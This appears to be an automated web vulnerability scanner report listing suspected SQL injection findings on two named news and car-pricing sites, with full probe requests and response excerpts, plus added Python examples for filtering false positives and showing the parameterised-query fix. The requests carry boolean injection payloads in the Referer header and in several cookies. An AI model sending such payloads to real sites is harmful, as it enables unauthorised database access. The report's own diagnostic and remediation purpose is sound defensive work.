GET /mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c49362984'%20or%201%3d2--%20 HTTP/1.1 Host: www.carpricesecrets.com Proxy-Connection: keep-alive Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:38:18 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: Apache=174.121.222.18.1291768698223179; path=/; expires=Tue, 03-Dec-30 00:38:18 GMT X-Powered-By: PHP/5.2.10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE" Set-Cookie: PHPSESSID=eppuftqhqhu6cu3jqgfom8v0e2; path=/; domain=www.carpricesecrets.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: detid=1002; expires=Wed, 15-Dec-2010 00:38:18 GMT; path=/; domain=www.carpricesecrets.com Set-Cookie: landing_id=70445717; expires=Wed, 15-Dec-2010 00:38:18 GMT; path=/; domain=www.carpricesecrets.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27726
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Get the Lowest Mercury Price Quotes at CarPriceSecrets.com</title> <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Script-Type" content="application/javascript" /> <meta name="description" content="CarPriceSecrets.com finds the lowest possible Mercury prices at your local Mercury dealers. We also reveal the secrets to negotiating your lowest possible price on a new Mercury. Our service is fast and free." /> <meta name="keywords" content="mercury price quotes, mercury prices, new car prices, new car pricing" /> <link rel="shortcut icon" href="http://images.carpricesecrets.com/favicon.ico" type="image/x-icon" />
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 16701620'%20or%201%3d1--%20 and 16701620'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /california/ci_16783052?nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q=16701620'%20or%201%3d1--%20
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The transgender community will have access to a new health clinic specifically designed with their needs in mind. The result of a partnership between Humboldt County transgender advocates and Bay Area agencies, the Humboldt Open Door Clinic is'><meta name="keywords" content="state news california bay area"/><title>Open Door starts Humboldt's first transgender health clinic - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The transgender community will have access to a new health clinic specifically designed with their needs in mind. The result of a partnership between Humboldt County transgender advocates and Bay Area agencies, the Humboldt Open Door Clinic is'><meta name="keywords" content="state news california bay area"/><title>Open Door starts Humboldt's first transgender health clinic - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
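The note above applies with particular force to these findings: the response excerpts shown for the two probes are identical in their visible parts, and the pages embed third-party ad loaders and session state, so the difference the scanner detected may sit in volatile content rather than in query behaviour. The following Python helper is an added example for that manual review; it is not part of the scanner output or of either site's code. It normalises two response bodies by stripping tokens assumed to be volatile (the checkm8 ad loader tag, JSESSIONID values, cache-buster counters, clock times) and only reports a finding as likely injectable when the true/false difference survives normalisation while two baseline responses to the same unmodified request do not differ. All responses in it are constructed for the example; nothing is sent over the network.

```python
import re

# Tokens assumed (for this example) to change between otherwise identical
# responses: the checkm8 ad loader tag, session identifiers, cache-busters
# and clock times. Extend this list from what the real responses show.
VOLATILE = [
    re.compile(r'<script[^>]*checkm8[^>]*></script>', re.IGNORECASE),
    re.compile(r'JSESSIONID=[A-Z0-9]+'),
    re.compile(r'\bcb=\d+'),
    re.compile(r'\b\d{2}:\d{2}:\d{2}\b'),
]


def normalise(body: str) -> str:
    """Remove volatile tokens and collapse whitespace so that only
    content differences remain."""
    for pattern in VOLATILE:
        body = pattern.sub('', body)
    return re.sub(r'\s+', ' ', body).strip()


def classify(baseline_a: str, baseline_b: str,
             neutral_probe: str, active_probe: str) -> str:
    """Decide whether a true/false response pair supports a SQL injection
    finding.

    baseline_a, baseline_b: two responses to the unmodified request.
    neutral_probe: response to the condition that leaves the query's meaning
        unchanged ("and 1=1" or "or 1=2" payloads).
    active_probe: response to the condition that changes it
        ("and 1=2" or "or 1=1" payloads).
    """
    if normalise(baseline_a) != normalise(baseline_b):
        return 'noisy-channel'          # page differs with no payload at all
    if normalise(neutral_probe) == normalise(active_probe):
        return 'likely-false-positive'  # the only differences were volatile
    if normalise(neutral_probe) != normalise(baseline_a):
        return 'inconclusive'           # neutral probe already changed the page
    return 'likely-injectable'


# Constructed sample responses modelled on the excerpts above: a fixed story
# page whose only per-request variation is the ad loader's cache-buster.
PAGE = ('<html><head><title>Woman stabbed to death in Antioch; suspect arrested'
        ' - ContraCostaTimes.com</title><script language="JavaScript" src='
        '"http://q1digital.checkm8.com/adam/cm8adam_1_call.js?cb={cb}"></script>'
        '</head><body>{body}</body></html>')


def page(cb: int, body: str = 'Antioch police say that pair likely had been arguing before attack') -> str:
    return PAGE.format(cb=cb, body=body)


SAMPLE = {
    'baseline_a': page(cb=1291762313102),
    'baseline_b': page(cb=1291762313999),
    # what the scanner saw: the two probes differ only in volatile content
    'noise_neutral': page(cb=1291762314001),
    'noise_active': page(cb=1291762314777),
    # a genuine boolean-blind case: the false condition drops the article body
    'real_neutral': page(cb=1291762315001),
    'real_active': page(cb=1291762315002, body='No article found'),
}

if __name__ == '__main__':
    s = SAMPLE
    print('scanner pair:', classify(s['baseline_a'], s['baseline_b'],
                                    s['noise_neutral'], s['noise_active']))
    print('real pair:   ', classify(s['baseline_a'], s['baseline_b'],
                                    s['real_neutral'], s['real_active']))
```

Run it against the real pages by fetching the unmodified request twice and each probe once, and feed the four bodies to classify. A 'noisy-channel' result means the VOLATILE list needs more entries before the pair can be judged at all; a 'likely-injectable' result still warrants a second probe pair with fresh random numbers, since a single agreement can be coincidence.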
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 94603801'%20or%201%3d1--%20 and 94603801'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16759989?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q=94603801'%20or%201%3d1--%20
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='A registered sex offender was arrested on suspicion of raping a 2-year-old girl in a Dollar Tree store as her relatives were Christmas shopping in the next aisle, police said Thursday.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Union City sex offender accused of raping 2-year-old - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" ...[SNIP]...
Request 2
GET /ci_16759989?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q=94603801'%20or%201%3d2--%20
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='A registered sex offender was arrested on suspicion of raping a 2-year-old girl in a Dollar Tree store as her relatives were Christmas shopping in the next aisle, police said Thursday.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Union City sex offender accused of raping 2-year-old - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginter ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. The payloads 40344553'%20or%201%3d1--%20 and 40344553'%20or%201%3d2--%20 were each submitted in the UserType cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16774009?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser40344553'%20or%201%3d1--%20; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='City leaders could reappoint official, who lost election, to fill soon-to-be vacant seat'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Pleasant Hill council must grapple soon with filling seat - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractiv ...[SNIP]...
Request 2
GET /ci_16774009?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser40344553'%20or%201%3d2--%20; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='City leaders could reappoint official, who lost election, to fill soon-to-be vacant seat'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Pleasant Hill council must grapple soon with filling seat - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn"; MNGiRegistrationUrl = "https ...[SNIP]...
The EMETA_COOKIE_CHECK_MNGI cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the EMETA_COOKIE_CHECK_MNGI cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16790597?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1%20and%201%3d1--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='OK. I admit it. I enjoy reading other peoples mail as much as the next guy, so going through the WikiLeaks cables has made for some fascinating reading.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Thomas Friedman: WikiLeaks confirms that America is leaking leverage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/ ...[SNIP]...
Request 2
GET /ci_16790597?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1%20and%201%3d2--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='OK. I admit it. I enjoy reading other peoples mail as much as the next guy, so going through the WikiLeaks cables has made for some fascinating reading.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Thomas Friedman: WikiLeaks confirms that America is leaking leverage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/ ...[SNIP]...
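The UserType and EMETA_COOKIE_CHECK_MNGI findings above show the two contexts described in the remediation background: a string context, where the payload has to close the quoted value (Browser40344553' or 1=1-- ), and a numeric context, where a space is enough (1 and 1=1-- ). The following Python/SQLite model is an added example and not code from contracostatimes.com; the visitors table, its columns and the query shape are assumptions, because the report does not reveal the real query. It reproduces the true/false response difference when the two cookie values are concatenated into SQL, and shows that a parameterised query with the numeric cookie converted to an integer first returns the same count for both probes.

```python
import sqlite3
from urllib.parse import unquote

# Payloads exactly as they appear (URL-encoded) in the reported cookies.
STRING_TRUE = unquote("Browser40344553'%20or%201%3d1--%20")
STRING_FALSE = unquote("Browser40344553'%20or%201%3d2--%20")
NUMERIC_TRUE = unquote("1%20and%201%3d1--%20")
NUMERIC_FALSE = unquote("1%20and%201%3d2--%20")


def build_db() -> sqlite3.Connection:
    """Assumed schema for the example: a visitors table looked up by the
    two cookie values. Three constructed rows, two of them 'Browser'."""
    conn = sqlite3.connect(':memory:')
    conn.executescript("""
        CREATE TABLE visitors (id INTEGER PRIMARY KEY, user_type TEXT, cookie_check INTEGER);
        INSERT INTO visitors VALUES (1, 'Browser', 1), (2, 'Browser', 1), (3, 'Subscriber', 1);
    """)
    return conn


def count_vulnerable(conn, user_type: str, cookie_check: str) -> int:
    """The flawed pattern: cookie values are pasted into the SQL text.
    The quoted context needs a ' to break out; the numeric one does not,
    which is why doubling quotes would not have protected cookie_check."""
    sql = ("SELECT COUNT(*) FROM visitors WHERE user_type = '" + user_type
           + "' AND cookie_check = " + cookie_check)
    return conn.execute(sql).fetchone()[0]


def count_parameterised(conn, user_type: str, cookie_check: str) -> int:
    """The fix: query structure is fixed first, values are bound second, and
    the numeric cookie is converted to an int before it gets near SQL."""
    try:
        check = int(cookie_check)
    except ValueError:
        return 0  # reject malformed input rather than try to sanitise it
    sql = 'SELECT COUNT(*) FROM visitors WHERE user_type = ? AND cookie_check = ?'
    return conn.execute(sql, (user_type, check)).fetchone()[0]


def run_probes(conn, count_fn) -> dict:
    """Replay the scanner's true/false pairs through one query function.
    A difference between the _true and _false entries is what a
    difference-based scanner keys on."""
    return {
        'baseline': count_fn(conn, 'Browser', '1'),
        'string_true': count_fn(conn, STRING_TRUE, '1'),
        'string_false': count_fn(conn, STRING_FALSE, '1'),
        'numeric_true': count_fn(conn, 'Browser', NUMERIC_TRUE),
        'numeric_false': count_fn(conn, 'Browser', NUMERIC_FALSE),
    }


if __name__ == '__main__':
    db = build_db()
    print('concatenated :', run_probes(db, count_vulnerable))
    print('parameterised:', run_probes(db, count_parameterised))
```

With concatenation the string probe returns every row for 1=1 and none for 1=2, and the numeric probe returns the baseline count for 1=1 and none for 1=2; the trailing comment marker is what discards the rest of the original WHERE clause in both cases. With parameters bound, the string payload is simply a user_type value that matches nothing and the numeric payload fails integer conversion, so both probes return the same count and there is no difference left to detect.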
The fPage cookie appears to be vulnerable to SQL injection attacks. The payloads 12191704'%20or%201%3d1--%20 and 12191704'%20or%201%3d2--%20 were each submitted in the fPage cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16790963?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true12191704'%20or%201%3d1--%20; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/Er ...[SNIP]...
Request 2
GET /ci_16790963?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true12191704'%20or%201%3d2--%20; EMETA_NCLICK_MNGI=2;
